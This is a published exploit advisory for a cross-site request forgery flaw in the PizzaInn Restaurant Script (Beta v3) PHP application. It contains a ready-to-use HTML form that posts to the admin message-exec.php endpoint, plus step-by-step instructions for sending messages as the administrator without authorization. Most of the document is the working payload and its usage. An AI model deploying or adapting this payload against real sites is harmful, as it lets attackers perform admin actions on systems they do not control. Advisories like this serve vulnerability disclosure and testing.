# Exploit Title :----------------- : PizzaInn Restaurant Scripti (Beta v3) - (message-exec.php) - CSRF Send Inbox Message.
# Author :------------------------ : Nassim Asrir 
# Author Company :------------------------ : HenceForth
# Author Email :------------------------ : wassline@gmail.com
# Google Dork :---------------- :  -
# Date :-------------------------- : 20/10/2016
# Type :-------------------------- : webapps
# Platform : -------------------- :  PHP  
# Software link : -------------- : http://wmscripti.com/php-scriptler/pizzainn-restaurant-scripti-beta-v3.html
 
   
############################ CSRF Send Inbox Message Vulnerabilty ############################
       
## Exploit ##

<h1>Messages Management </h1>
</div>
<div id="container">
<form id="messageForm" name="messageForm" method="post" action="http://localhost/script/admin/message-exec.php" onsubmit="return messageValidate(this)">
  <table width="540" border="0" cellpadding="2" cellspacing="0" align="center">
  <CAPTION><h3>SEND A MESSAGE</h3></CAPTION>
    <tr>
      <th width="200">Subject</th>
      <td width="168"><input type="text" name="subject" id="subject" class="textfield" /></td>
    </tr>
    <tr>
      <th width="200">Message Box</th>
      <td width="168"><textarea name="txtmessage" class="textfield" rows="5" cols="60"></textarea></td>
    </tr>
    <tr>
      <td>&nbsp;</td>
      <td align="center"><input type="submit" name="Submit" value="Send Message" />
	  <input type="reset" name="Reset" value="Clear Field" /></td>
    </tr>
  </table>
</form>
<hr>
<table border="0" width="1000" align="center">
<CAPTION><h3>CSRF By Nassim Asrir</h3></CAPTION>

## Proc ##

- P.S: You must to register in the site to see the Inbox Message send by Admin.

- Create a .html File and Put the Code.

- Navigate the File in your Localhost .

- and Create Message in The Text Box  and you redirect to http://site/script/admin/access-denied.php

- and You get the Message "Access Denied! You do not have access to this resource." but don't worry. when you get the Message go to Your account . and you can see [Inbox] Navigate it and you see the Message .